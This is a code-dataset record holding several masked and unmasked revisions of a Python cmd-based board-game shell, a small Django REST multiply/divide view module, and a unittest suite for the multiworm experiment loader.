"step-3": "<mask token>\n\n\nclass CMD(Cmd):\n\n def __init__(self):\n pass\n\n def do_move(self, direction):\n if direction == 'up':\n self.game.movePlayer(0, 1)\n elif direction == 'down':\n self.game.movePlayer(0, -1)\n elif direction == 'left':\n self.game.movePlayer(-1, 0)\n elif direction == 'right':\n self.game.movePlayer(1, 0)\n else:\n print('No valid direction given.')\n\n def do_rotateTile(self, rotation):\n pass\n <mask token>\n\n def do_drawCard(self):\n pass\n\n def do_run(self):\n pass\n\n def do_fight(self):\n pass\n\n def do_save(self, fileName):\n self.game.save(fileName)\n\n def do_load(self, fileName):\n self.game.load(fileName)\n\n def do_quit(self):\n return True\n\n def validateCommands(self):\n pass\n\n def loadFile(filePath):\n self.game.loadFile(filePath)\n",
"step-4": "<mask token>\n\n\nclass CMD(Cmd):\n\n def __init__(self):\n pass\n\n def do_move(self, direction):\n if direction == 'up':\n self.game.movePlayer(0, 1)\n elif direction == 'down':\n self.game.movePlayer(0, -1)\n elif direction == 'left':\n self.game.movePlayer(-1, 0)\n elif direction == 'right':\n self.game.movePlayer(1, 0)\n else:\n print('No valid direction given.')\n\n def do_rotateTile(self, rotation):\n pass\n\n def do_placeTile(self):\n pass\n\n def do_drawCard(self):\n pass\n\n def do_run(self):\n pass\n\n def do_fight(self):\n pass\n\n def do_save(self, fileName):\n self.game.save(fileName)\n\n def do_load(self, fileName):\n self.game.load(fileName)\n\n def do_quit(self):\n return True\n\n def validateCommands(self):\n pass\n\n def loadFile(filePath):\n self.game.loadFile(filePath)\n",
"step-5": "from cmd import Cmd\n\nclass CMD(Cmd):\n def __init__(self):\n pass\n\n def do_move(self, direction):\n if direction == \"up\":\n self.game.movePlayer(0, 1)\n elif direction == \"down\":\n self.game.movePlayer(0, -1)\n elif direction == \"left\":\n self.game.movePlayer(-1, 0)\n elif direction == \"right\":\n self.game.movePlayer(1, 0)\n else:\n print(\"No valid direction given.\")\n\n def do_rotateTile(self, rotation):\n pass\n\n def do_placeTile(self):\n pass\n\n def do_drawCard(self):\n pass\n\n def do_run(self):\n pass\n\n def do_fight(self):\n pass\n\n def do_save(self, fileName):\n self.game.save(fileName)\n\n def do_load(self, fileName):\n self.game.load(fileName)\n\n def do_quit(self):\n return True\n\n def validateCommands(self):\n pass\n\n # New\n def loadFile(filePath):\n self.game.loadFile(filePath)\n # End New\n",
"step-ids": [
7,
11,
12,
13,
15
]
}
|
[
7,
11,
12,
13,
15
] |
from django.http import HttpResponseRedirect
from django.shortcuts import render
__author__ = 'jhonjairoroa87'
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework_jsonp.renderers import JSONPRenderer
from django.db import models
from .form import NameForm
def multiply(a,b):
return a*b
class Multiply(APIView):
renderer_classes = (JSONPRenderer,)
@staticmethod
def get(request):
form = NameForm()
return render(request, 'name.html', {'form': form})
@staticmethod
def post(request):
form = NameForm(request.POST)
if form.is_valid():
a = form.cleaned_data['one']
b = form.cleaned_data['second']
data = multiply(a, b)
return render(request, 'name.html', {'data': data})
else:
return render(request, 'name.html', {'data': "error"})
class Divide(APIView):
renderer_classes = (JSONPRenderer,)
@staticmethod
def get(request):
try:
first_number = int(request.GET.get('a'))
second_number = int(request.GET.get('b'))
return Response({'result': first_number / second_number})
except Exception as e:
return Response({'result': 'there was an error ' + str(e)})
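# Added note: a missing query parameter makes request.GET.get return None,
# so int(None) raises TypeError; like ZeroDivisionError for b=0, it is
# caught by the except clause above and reported in the JSON payload.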
|
normal
|
{
"blob_id": "4c483636316dfa660f10b1aba900813bc3e95ebe",
"index": 9463,
"step-1": "<mask token>\n\n\nclass Divide(APIView):\n renderer_classes = JSONPRenderer,\n\n @staticmethod\n def get(request):\n try:\n first_number = int(request.GET.get('a'))\n second_number = int(request.GET.get('b'))\n return Response({'result': first_number / second_number})\n except Exception as e:\n return Response({'result': 'there was an error ' + str(e)})\n",
"step-2": "<mask token>\n\n\nclass Multiply(APIView):\n <mask token>\n\n @staticmethod\n def get(request):\n form = NameForm()\n return render(request, 'name.html', {'form': form})\n\n @staticmethod\n def post(request):\n form = NameForm(request.POST)\n if form.is_valid():\n a = form.cleaned_data['one']\n b = form.cleaned_data['second']\n data = multiply(a, b)\n return render(request, 'name.html', {'data': data})\n else:\n return render(request, 'name.html', {'data': 'error'})\n\n\nclass Divide(APIView):\n renderer_classes = JSONPRenderer,\n\n @staticmethod\n def get(request):\n try:\n first_number = int(request.GET.get('a'))\n second_number = int(request.GET.get('b'))\n return Response({'result': first_number / second_number})\n except Exception as e:\n return Response({'result': 'there was an error ' + str(e)})\n",
"step-3": "<mask token>\n__author__ = 'jhonjairoroa87'\n<mask token>\n\n\ndef multiply(a, b):\n return a * b\n\n\nclass Multiply(APIView):\n renderer_classes = JSONPRenderer,\n\n @staticmethod\n def get(request):\n form = NameForm()\n return render(request, 'name.html', {'form': form})\n\n @staticmethod\n def post(request):\n form = NameForm(request.POST)\n if form.is_valid():\n a = form.cleaned_data['one']\n b = form.cleaned_data['second']\n data = multiply(a, b)\n return render(request, 'name.html', {'data': data})\n else:\n return render(request, 'name.html', {'data': 'error'})\n\n\nclass Divide(APIView):\n renderer_classes = JSONPRenderer,\n\n @staticmethod\n def get(request):\n try:\n first_number = int(request.GET.get('a'))\n second_number = int(request.GET.get('b'))\n return Response({'result': first_number / second_number})\n except Exception as e:\n return Response({'result': 'there was an error ' + str(e)})\n",
"step-4": "from django.http import HttpResponseRedirect\nfrom django.shortcuts import render\n__author__ = 'jhonjairoroa87'\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework_jsonp.renderers import JSONPRenderer\nfrom django.db import models\nfrom .form import NameForm\n\n\ndef multiply(a, b):\n return a * b\n\n\nclass Multiply(APIView):\n renderer_classes = JSONPRenderer,\n\n @staticmethod\n def get(request):\n form = NameForm()\n return render(request, 'name.html', {'form': form})\n\n @staticmethod\n def post(request):\n form = NameForm(request.POST)\n if form.is_valid():\n a = form.cleaned_data['one']\n b = form.cleaned_data['second']\n data = multiply(a, b)\n return render(request, 'name.html', {'data': data})\n else:\n return render(request, 'name.html', {'data': 'error'})\n\n\nclass Divide(APIView):\n renderer_classes = JSONPRenderer,\n\n @staticmethod\n def get(request):\n try:\n first_number = int(request.GET.get('a'))\n second_number = int(request.GET.get('b'))\n return Response({'result': first_number / second_number})\n except Exception as e:\n return Response({'result': 'there was an error ' + str(e)})\n",
"step-5": "from django.http import HttpResponseRedirect\nfrom django.shortcuts import render\n\n__author__ = 'jhonjairoroa87'\n\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework_jsonp.renderers import JSONPRenderer\nfrom django.db import models\nfrom .form import NameForm\n\n\ndef multiply(a,b):\n return a*b\n\nclass Multiply(APIView):\n\n renderer_classes = (JSONPRenderer,)\n\n @staticmethod\n def get(request):\n form = NameForm()\n\n return render(request, 'name.html', {'form': form})\n\n @staticmethod\n def post(request):\n form = NameForm(request.POST)\n if form.is_valid():\n a = form.cleaned_data['one']\n b = form.cleaned_data['second']\n data = multiply(a, b)\n return render(request, 'name.html', {'data': data})\n else:\n return render(request, 'name.html', {'data': \"error\"})\n\n\nclass Divide(APIView):\n\n renderer_classes = (JSONPRenderer,)\n\n @staticmethod\n def get(request):\n try:\n first_number = int(request.GET.get('a'))\n second_number = int(request.GET.get('b'))\n return Response({'result': first_number / second_number})\n except Exception as e:\n return Response({'result': 'there was an error ' + str(e)})\n\n",
"step-ids": [
3,
6,
9,
10,
11
]
}
|
[
3,
6,
9,
10,
11
] |
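The Django record above imports NameForm from a .form module that the snippet never shows; only the cleaned_data keys 'one' and 'second' are visible. A minimal sketch of what such a form could look like, assuming integer inputs (the field types and labels are guesses, not part of the record):

# Hypothetical form.py -- only the field names 'one' and 'second' come
# from the record's cleaned_data lookups; IntegerField and the labels
# are assumptions.
from django import forms


class NameForm(forms.Form):
    one = forms.IntegerField(label='first number')
    second = forms.IntegerField(label='second number')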
<|reserved_special_token_0|>
class TestExperimentOpen(unittest.TestCase):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class TestMalformedExperiments(unittest.TestCase):
def test_nonexistent_folder(self):
try:
ex = multiworm.Experiment(DATA_DIR /
'guaranteedtohopefullynotbethere')
except multiworm.core.MWTDataError:
self.fail('Overly specific error raised')
except IOError as e:
self.assertIn('exist', str(e))
else:
self.fail("Didn't even mention the folder isn't there")
def test_check_is_dir(self):
try:
ex = multiworm.Experiment(SYNTH1 / 'test_blobsfile.png')
except multiworm.core.MWTDataError:
self.fail('Overly specific error raised')
except IOError as e:
self.assertIn('directory', str(e))
else:
self.fail("Didn't even mention the folder isn't there")
def test_missing_summary(self):
try:
ex = multiworm.Experiment(DATA_DIR / 'bad_empty')
except multiworm.core.MWTDataError as e:
pass
else:
self.fail("Didn't raise error despite no summary file")
def test_dupe_summary(self):
try:
ex = multiworm.Experiment(DATA_DIR / 'bad_twosummary')
except multiworm.core.MWTSummaryError as e:
pass
else:
self.fail("Didn't raise error with ambiguous summary file")
class TestMalformedData(unittest.TestCase):
def test_zero_frame(self):
try:
ex = multiworm.Experiment(DATA_DIR / 'bad_framezero')
except multiworm.core.MWTDataError:
pass
else:
self.fail("Didn't raise error on malformed data with a frame 0")
class TestReadingData(unittest.TestCase):
def setUp(self):
self.ex = multiworm.Experiment(SYNTH1)
def test_length_is_num_blobs(self):
self.assertEqual(SYNTH1_N_BLOBS, len(self.ex))
def test_iter(self):
count = 0
for thing in self.ex:
count += 1
self.assertEqual(SYNTH1_N_BLOBS, count)
def test_iter_blobs(self):
count = 0
for thing in self.ex.blobs():
count += 1
self.assertEqual(SYNTH1_N_BLOBS, count)
class TestExperimentProperties(unittest.TestCase):
def setUp(self):
self.ex = multiworm.Experiment(SYNTH1)
def test_blobs_in_frame(self):
self.assertEquals(list(self.ex.blobs_in_frame(10)), list(range(1, 12)))
self.assertEquals(list(self.ex.blobs_in_frame(200)), list(range(5, 12))
)
def test_locked_graph(self):
try:
self.ex.graph.add_node(123)
except nx.NetworkXError as e:
self.assertIn('frozen', str(e).lower())
else:
self.fail('experiment graph should be frozen/locked')
def test_graph_copy_unlocked(self):
G = self.ex.graph.copy()
G.add_node(123)
G.add_edge(55, 66)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestExperimentOpen(unittest.TestCase):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def test_callback(self):
class StateThing(object):
def __init__(self):
self.progress = -1
def __call__(self, progress):
assert progress >= self.progress
self.progress = progress
ex = multiworm.Experiment(SYNTH1, callback=StateThing())
class TestMalformedExperiments(unittest.TestCase):
def test_nonexistent_folder(self):
try:
ex = multiworm.Experiment(DATA_DIR /
'guaranteedtohopefullynotbethere')
except multiworm.core.MWTDataError:
self.fail('Overly specific error raised')
except IOError as e:
self.assertIn('exist', str(e))
else:
self.fail("Didn't even mention the folder isn't there")
def test_check_is_dir(self):
try:
ex = multiworm.Experiment(SYNTH1 / 'test_blobsfile.png')
except multiworm.core.MWTDataError:
self.fail('Overly specific error raised')
except IOError as e:
self.assertIn('directory', str(e))
else:
self.fail("Didn't even mention the folder isn't there")
def test_missing_summary(self):
try:
ex = multiworm.Experiment(DATA_DIR / 'bad_empty')
except multiworm.core.MWTDataError as e:
pass
else:
self.fail("Didn't raise error despite no summary file")
def test_dupe_summary(self):
try:
ex = multiworm.Experiment(DATA_DIR / 'bad_twosummary')
except multiworm.core.MWTSummaryError as e:
pass
else:
self.fail("Didn't raise error with ambiguous summary file")
class TestMalformedData(unittest.TestCase):
def test_zero_frame(self):
try:
ex = multiworm.Experiment(DATA_DIR / 'bad_framezero')
except multiworm.core.MWTDataError:
pass
else:
self.fail("Didn't raise error on malformed data with a frame 0")
class TestReadingData(unittest.TestCase):
def setUp(self):
self.ex = multiworm.Experiment(SYNTH1)
def test_length_is_num_blobs(self):
self.assertEqual(SYNTH1_N_BLOBS, len(self.ex))
def test_iter(self):
count = 0
for thing in self.ex:
count += 1
self.assertEqual(SYNTH1_N_BLOBS, count)
def test_iter_blobs(self):
count = 0
for thing in self.ex.blobs():
count += 1
self.assertEqual(SYNTH1_N_BLOBS, count)
class TestExperimentProperties(unittest.TestCase):
def setUp(self):
self.ex = multiworm.Experiment(SYNTH1)
def test_blobs_in_frame(self):
self.assertEquals(list(self.ex.blobs_in_frame(10)), list(range(1, 12)))
self.assertEquals(list(self.ex.blobs_in_frame(200)), list(range(5, 12))
)
def test_locked_graph(self):
try:
self.ex.graph.add_node(123)
except nx.NetworkXError as e:
self.assertIn('frozen', str(e).lower())
else:
self.fail('experiment graph should be frozen/locked')
def test_graph_copy_unlocked(self):
G = self.ex.graph.copy()
G.add_node(123)
G.add_edge(55, 66)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestExperimentOpen(unittest.TestCase):
def test_pathlib(self):
ex = multiworm.Experiment(SYNTH1)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def test_strroot_and_id(self):
ex = multiworm.Experiment(data_root=str(DATA_DIR), experiment_id=
'synth1')
def test_empty_fail(self):
try:
multiworm.Experiment()
except Exception as e:
if not isinstance(e, ValueError):
self.fail('raised some unexpected error')
if not all(x in str(e) for x in ['experiment_id', 'must',
'provided']):
self.fail('error message unexpected')
else:
self.fail('experiment constructor worked with no arguments')
def test_dataroot_only_fail(self):
try:
multiworm.Experiment(data_root=DATA_DIR)
except Exception as e:
if not isinstance(e, ValueError):
self.fail('raised some unexpected error')
if not all(x in str(e) for x in ['experiment_id', 'must',
'provided']):
self.fail('error message unexpected')
else:
self.fail(
'experiment constructor allowed data-root only without erroring'
)
def test_custom_id(self):
my_id = 'peterspeppers'
ex = multiworm.Experiment(fullpath=SYNTH1, experiment_id=my_id)
self.assertEquals(ex.id, my_id)
def test_callback(self):
class StateThing(object):
def __init__(self):
self.progress = -1
def __call__(self, progress):
assert progress >= self.progress
self.progress = progress
ex = multiworm.Experiment(SYNTH1, callback=StateThing())
class TestMalformedExperiments(unittest.TestCase):
def test_nonexistent_folder(self):
try:
ex = multiworm.Experiment(DATA_DIR /
'guaranteedtohopefullynotbethere')
except multiworm.core.MWTDataError:
self.fail('Overly specific error raised')
except IOError as e:
self.assertIn('exist', str(e))
else:
self.fail("Didn't even mention the folder isn't there")
def test_check_is_dir(self):
try:
ex = multiworm.Experiment(SYNTH1 / 'test_blobsfile.png')
except multiworm.core.MWTDataError:
self.fail('Overly specific error raised')
except IOError as e:
self.assertIn('directory', str(e))
else:
self.fail("Didn't even mention the folder isn't there")
def test_missing_summary(self):
try:
ex = multiworm.Experiment(DATA_DIR / 'bad_empty')
except multiworm.core.MWTDataError as e:
pass
else:
self.fail("Didn't raise error despite no summary file")
def test_dupe_summary(self):
try:
ex = multiworm.Experiment(DATA_DIR / 'bad_twosummary')
except multiworm.core.MWTSummaryError as e:
pass
else:
self.fail("Didn't raise error with ambiguous summary file")
class TestMalformedData(unittest.TestCase):
def test_zero_frame(self):
try:
ex = multiworm.Experiment(DATA_DIR / 'bad_framezero')
except multiworm.core.MWTDataError:
pass
else:
self.fail("Didn't raise error on malformed data with a frame 0")
class TestReadingData(unittest.TestCase):
def setUp(self):
self.ex = multiworm.Experiment(SYNTH1)
def test_length_is_num_blobs(self):
self.assertEqual(SYNTH1_N_BLOBS, len(self.ex))
def test_iter(self):
count = 0
for thing in self.ex:
count += 1
self.assertEqual(SYNTH1_N_BLOBS, count)
def test_iter_blobs(self):
count = 0
for thing in self.ex.blobs():
count += 1
self.assertEqual(SYNTH1_N_BLOBS, count)
class TestExperimentProperties(unittest.TestCase):
def setUp(self):
self.ex = multiworm.Experiment(SYNTH1)
def test_blobs_in_frame(self):
self.assertEquals(list(self.ex.blobs_in_frame(10)), list(range(1, 12)))
self.assertEquals(list(self.ex.blobs_in_frame(200)), list(range(5, 12))
)
def test_locked_graph(self):
try:
self.ex.graph.add_node(123)
except nx.NetworkXError as e:
self.assertIn('frozen', str(e).lower())
else:
self.fail('experiment graph should be frozen/locked')
def test_graph_copy_unlocked(self):
G = self.ex.graph.copy()
G.add_node(123)
G.add_edge(55, 66)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
TEST_ROOT = pathlib.Path(__file__).parent.resolve()
DATA_DIR = TEST_ROOT / 'data'
SYNTH1 = DATA_DIR / 'synth1'
SYNTH1_N_BLOBS = 12
class TestExperimentOpen(unittest.TestCase):
def test_pathlib(self):
ex = multiworm.Experiment(SYNTH1)
def test_strpath(self):
ex = multiworm.Experiment(str(SYNTH1))
def test_root_and_id(self):
ex = multiworm.Experiment(data_root=DATA_DIR, experiment_id='synth1')
def test_strroot_and_id(self):
ex = multiworm.Experiment(data_root=str(DATA_DIR), experiment_id=
'synth1')
def test_empty_fail(self):
try:
multiworm.Experiment()
except Exception as e:
if not isinstance(e, ValueError):
self.fail('raised some unexpected error')
if not all(x in str(e) for x in ['experiment_id', 'must',
'provided']):
self.fail('error message unexpected')
else:
self.fail('experiment constructor worked with no arguments')
def test_dataroot_only_fail(self):
try:
multiworm.Experiment(data_root=DATA_DIR)
except Exception as e:
if not isinstance(e, ValueError):
self.fail('raised some unexpected error')
if not all(x in str(e) for x in ['experiment_id', 'must',
'provided']):
self.fail('error message unexpected')
else:
self.fail(
'experiment constructor allowed data-root only without erroring'
)
def test_custom_id(self):
my_id = 'peterspeppers'
ex = multiworm.Experiment(fullpath=SYNTH1, experiment_id=my_id)
self.assertEquals(ex.id, my_id)
def test_callback(self):
class StateThing(object):
def __init__(self):
self.progress = -1
def __call__(self, progress):
assert progress >= self.progress
self.progress = progress
ex = multiworm.Experiment(SYNTH1, callback=StateThing())
class TestMalformedExperiments(unittest.TestCase):
def test_nonexistent_folder(self):
try:
ex = multiworm.Experiment(DATA_DIR /
'guaranteedtohopefullynotbethere')
except multiworm.core.MWTDataError:
self.fail('Overly specific error raised')
except IOError as e:
self.assertIn('exist', str(e))
else:
self.fail("Didn't even mention the folder isn't there")
def test_check_is_dir(self):
try:
ex = multiworm.Experiment(SYNTH1 / 'test_blobsfile.png')
except multiworm.core.MWTDataError:
self.fail('Overly specific error raised')
except IOError as e:
self.assertIn('directory', str(e))
else:
self.fail("Didn't even mention the folder isn't there")
def test_missing_summary(self):
try:
ex = multiworm.Experiment(DATA_DIR / 'bad_empty')
except multiworm.core.MWTDataError as e:
pass
else:
self.fail("Didn't raise error despite no summary file")
def test_dupe_summary(self):
try:
ex = multiworm.Experiment(DATA_DIR / 'bad_twosummary')
except multiworm.core.MWTSummaryError as e:
pass
else:
self.fail("Didn't raise error with ambiguous summary file")
class TestMalformedData(unittest.TestCase):
def test_zero_frame(self):
try:
ex = multiworm.Experiment(DATA_DIR / 'bad_framezero')
except multiworm.core.MWTDataError:
pass
else:
self.fail("Didn't raise error on malformed data with a frame 0")
class TestReadingData(unittest.TestCase):
def setUp(self):
self.ex = multiworm.Experiment(SYNTH1)
def test_length_is_num_blobs(self):
self.assertEqual(SYNTH1_N_BLOBS, len(self.ex))
def test_iter(self):
count = 0
for thing in self.ex:
count += 1
self.assertEqual(SYNTH1_N_BLOBS, count)
def test_iter_blobs(self):
count = 0
for thing in self.ex.blobs():
count += 1
self.assertEqual(SYNTH1_N_BLOBS, count)
class TestExperimentProperties(unittest.TestCase):
def setUp(self):
self.ex = multiworm.Experiment(SYNTH1)
def test_blobs_in_frame(self):
self.assertEquals(list(self.ex.blobs_in_frame(10)), list(range(1, 12)))
self.assertEquals(list(self.ex.blobs_in_frame(200)), list(range(5, 12))
)
def test_locked_graph(self):
try:
self.ex.graph.add_node(123)
except nx.NetworkXError as e:
self.assertIn('frozen', str(e).lower())
else:
self.fail('experiment graph should be frozen/locked')
def test_graph_copy_unlocked(self):
G = self.ex.graph.copy()
G.add_node(123)
G.add_edge(55, 66)
<|reserved_special_token_1|>
from __future__ import absolute_import, print_function, unicode_literals
import six
from six.moves import zip, filter, map, reduce, input, range
import pathlib
import unittest
import networkx as nx
import multiworm
TEST_ROOT = pathlib.Path(__file__).parent.resolve()
DATA_DIR = TEST_ROOT / 'data'
SYNTH1 = DATA_DIR / 'synth1'
SYNTH1_N_BLOBS = 12
class TestExperimentOpen(unittest.TestCase):
def test_pathlib(self):
ex = multiworm.Experiment(SYNTH1)
def test_strpath(self):
ex = multiworm.Experiment(str(SYNTH1))
def test_root_and_id(self):
ex = multiworm.Experiment(
data_root=DATA_DIR,
experiment_id='synth1',
)
def test_strroot_and_id(self):
ex = multiworm.Experiment(
data_root=str(DATA_DIR),
experiment_id='synth1',
)
def test_empty_fail(self):
try:
multiworm.Experiment()
except Exception as e:
if not isinstance(e, ValueError):
self.fail('raised some unexpected error')
if not all(x in str(e) for x in ['experiment_id', 'must', 'provided']):
self.fail('error message unexpected')
else:
self.fail('experiment constructor worked with no arguments')
def test_dataroot_only_fail(self):
try:
multiworm.Experiment(data_root=DATA_DIR)
except Exception as e:
if not isinstance(e, ValueError):
self.fail('raised some unexpected error')
if not all(x in str(e) for x in ['experiment_id', 'must', 'provided']):
self.fail('error message unexpected')
else:
self.fail('experiment constructor allowed data-root only without erroring')
def test_custom_id(self):
my_id = 'peterspeppers'
ex = multiworm.Experiment(fullpath=SYNTH1, experiment_id=my_id)
self.assertEquals(ex.id, my_id)
def test_callback(self):
class StateThing(object):
def __init__(self):
self.progress = -1
def __call__(self, progress):
assert progress >= self.progress
self.progress = progress
ex = multiworm.Experiment(SYNTH1, callback=StateThing())
class TestMalformedExperiments(unittest.TestCase):
def test_nonexistent_folder(self):
try:
ex = multiworm.Experiment(DATA_DIR / 'guaranteedtohopefullynotbethere')
except multiworm.core.MWTDataError:
self.fail('Overly specific error raised')
except IOError as e:
self.assertIn('exist', str(e))
else:
self.fail("Didn't even mention the folder isn't there")
def test_check_is_dir(self):
try:
ex = multiworm.Experiment(SYNTH1 / 'test_blobsfile.png')
except multiworm.core.MWTDataError:
self.fail('Overly specific error raised')
except IOError as e:
self.assertIn('directory', str(e))
else:
self.fail("Didn't even mention the folder isn't there")
def test_missing_summary(self):
try:
ex = multiworm.Experiment(DATA_DIR / 'bad_empty')
except multiworm.core.MWTDataError as e:
pass
else:
self.fail("Didn't raise error despite no summary file")
def test_dupe_summary(self):
try:
ex = multiworm.Experiment(DATA_DIR / 'bad_twosummary')
except multiworm.core.MWTSummaryError as e:
pass
else:
self.fail("Didn't raise error with ambiguous summary file")
class TestMalformedData(unittest.TestCase):
def test_zero_frame(self):
try:
ex = multiworm.Experiment(DATA_DIR / 'bad_framezero')
except multiworm.core.MWTDataError:
pass
else:
self.fail("Didn't raise error on malformed data with a frame 0")
class TestReadingData(unittest.TestCase):
def setUp(self):
self.ex = multiworm.Experiment(SYNTH1)
def test_length_is_num_blobs(self):
self.assertEqual(SYNTH1_N_BLOBS, len(self.ex))
def test_iter(self):
count = 0
for thing in self.ex:
count += 1
self.assertEqual(SYNTH1_N_BLOBS, count)
def test_iter_blobs(self):
count = 0
for thing in self.ex.blobs():
count += 1
self.assertEqual(SYNTH1_N_BLOBS, count)
class TestExperimentProperties(unittest.TestCase):
def setUp(self):
self.ex = multiworm.Experiment(SYNTH1)
def test_blobs_in_frame(self):
self.assertEquals(list(self.ex.blobs_in_frame(10)), list(range(1, 12)))
self.assertEquals(list(self.ex.blobs_in_frame(200)), list(range(5, 12)))
def test_locked_graph(self):
try:
self.ex.graph.add_node(123)
except nx.NetworkXError as e:
self.assertIn('frozen', str(e).lower())
else:
self.fail('experiment graph should be frozen/locked')
def test_graph_copy_unlocked(self):
G = self.ex.graph.copy()
G.add_node(123)
G.add_edge(55, 66)
|
flexible
|
{
"blob_id": "dfee0407eaed7b1ab96467874bbfe6463865bcb4",
"index": 6238,
"step-1": "<mask token>\n\n\nclass TestExperimentOpen(unittest.TestCase):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass TestMalformedExperiments(unittest.TestCase):\n\n def test_nonexistent_folder(self):\n try:\n ex = multiworm.Experiment(DATA_DIR /\n 'guaranteedtohopefullynotbethere')\n except multiworm.core.MWTDataError:\n self.fail('Overly specific error raised')\n except IOError as e:\n self.assertIn('exist', str(e))\n else:\n self.fail(\"Didn't even mention the folder isn't there\")\n\n def test_check_is_dir(self):\n try:\n ex = multiworm.Experiment(SYNTH1 / 'test_blobsfile.png')\n except multiworm.core.MWTDataError:\n self.fail('Overly specific error raised')\n except IOError as e:\n self.assertIn('directory', str(e))\n else:\n self.fail(\"Didn't even mention the folder isn't there\")\n\n def test_missing_summary(self):\n try:\n ex = multiworm.Experiment(DATA_DIR / 'bad_empty')\n except multiworm.core.MWTDataError as e:\n pass\n else:\n self.fail(\"Didn't raise error despite no summary file\")\n\n def test_dupe_summary(self):\n try:\n ex = multiworm.Experiment(DATA_DIR / 'bad_twosummary')\n except multiworm.core.MWTSummaryError as e:\n pass\n else:\n self.fail(\"Didn't raise error with ambiguous summary file\")\n\n\nclass TestMalformedData(unittest.TestCase):\n\n def test_zero_frame(self):\n try:\n ex = multiworm.Experiment(DATA_DIR / 'bad_framezero')\n except multiworm.core.MWTDataError:\n pass\n else:\n self.fail(\"Didn't raise error on malformed data with a frame 0\")\n\n\nclass TestReadingData(unittest.TestCase):\n\n def setUp(self):\n self.ex = multiworm.Experiment(SYNTH1)\n\n def test_length_is_num_blobs(self):\n self.assertEqual(SYNTH1_N_BLOBS, len(self.ex))\n\n def test_iter(self):\n count = 0\n for thing in self.ex:\n count += 1\n self.assertEqual(SYNTH1_N_BLOBS, count)\n\n def test_iter_blobs(self):\n count = 0\n for thing in self.ex.blobs():\n count += 1\n self.assertEqual(SYNTH1_N_BLOBS, count)\n\n\nclass TestExperimentProperties(unittest.TestCase):\n\n def setUp(self):\n self.ex = multiworm.Experiment(SYNTH1)\n\n def test_blobs_in_frame(self):\n self.assertEquals(list(self.ex.blobs_in_frame(10)), list(range(1, 12)))\n self.assertEquals(list(self.ex.blobs_in_frame(200)), list(range(5, 12))\n )\n\n def test_locked_graph(self):\n try:\n self.ex.graph.add_node(123)\n except nx.NetworkXError as e:\n self.assertIn('frozen', str(e).lower())\n else:\n self.fail('experiment graph should be frozen/locked')\n\n def test_graph_copy_unlocked(self):\n G = self.ex.graph.copy()\n G.add_node(123)\n G.add_edge(55, 66)\n",
"step-2": "<mask token>\n\n\nclass TestExperimentOpen(unittest.TestCase):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def test_callback(self):\n\n\n class StateThing(object):\n\n def __init__(self):\n self.progress = -1\n\n def __call__(self, progress):\n assert progress >= self.progress\n self.progress = progress\n ex = multiworm.Experiment(SYNTH1, callback=StateThing())\n\n\nclass TestMalformedExperiments(unittest.TestCase):\n\n def test_nonexistent_folder(self):\n try:\n ex = multiworm.Experiment(DATA_DIR /\n 'guaranteedtohopefullynotbethere')\n except multiworm.core.MWTDataError:\n self.fail('Overly specific error raised')\n except IOError as e:\n self.assertIn('exist', str(e))\n else:\n self.fail(\"Didn't even mention the folder isn't there\")\n\n def test_check_is_dir(self):\n try:\n ex = multiworm.Experiment(SYNTH1 / 'test_blobsfile.png')\n except multiworm.core.MWTDataError:\n self.fail('Overly specific error raised')\n except IOError as e:\n self.assertIn('directory', str(e))\n else:\n self.fail(\"Didn't even mention the folder isn't there\")\n\n def test_missing_summary(self):\n try:\n ex = multiworm.Experiment(DATA_DIR / 'bad_empty')\n except multiworm.core.MWTDataError as e:\n pass\n else:\n self.fail(\"Didn't raise error despite no summary file\")\n\n def test_dupe_summary(self):\n try:\n ex = multiworm.Experiment(DATA_DIR / 'bad_twosummary')\n except multiworm.core.MWTSummaryError as e:\n pass\n else:\n self.fail(\"Didn't raise error with ambiguous summary file\")\n\n\nclass TestMalformedData(unittest.TestCase):\n\n def test_zero_frame(self):\n try:\n ex = multiworm.Experiment(DATA_DIR / 'bad_framezero')\n except multiworm.core.MWTDataError:\n pass\n else:\n self.fail(\"Didn't raise error on malformed data with a frame 0\")\n\n\nclass TestReadingData(unittest.TestCase):\n\n def setUp(self):\n self.ex = multiworm.Experiment(SYNTH1)\n\n def test_length_is_num_blobs(self):\n self.assertEqual(SYNTH1_N_BLOBS, len(self.ex))\n\n def test_iter(self):\n count = 0\n for thing in self.ex:\n count += 1\n self.assertEqual(SYNTH1_N_BLOBS, count)\n\n def test_iter_blobs(self):\n count = 0\n for thing in self.ex.blobs():\n count += 1\n self.assertEqual(SYNTH1_N_BLOBS, count)\n\n\nclass TestExperimentProperties(unittest.TestCase):\n\n def setUp(self):\n self.ex = multiworm.Experiment(SYNTH1)\n\n def test_blobs_in_frame(self):\n self.assertEquals(list(self.ex.blobs_in_frame(10)), list(range(1, 12)))\n self.assertEquals(list(self.ex.blobs_in_frame(200)), list(range(5, 12))\n )\n\n def test_locked_graph(self):\n try:\n self.ex.graph.add_node(123)\n except nx.NetworkXError as e:\n self.assertIn('frozen', str(e).lower())\n else:\n self.fail('experiment graph should be frozen/locked')\n\n def test_graph_copy_unlocked(self):\n G = self.ex.graph.copy()\n G.add_node(123)\n G.add_edge(55, 66)\n",
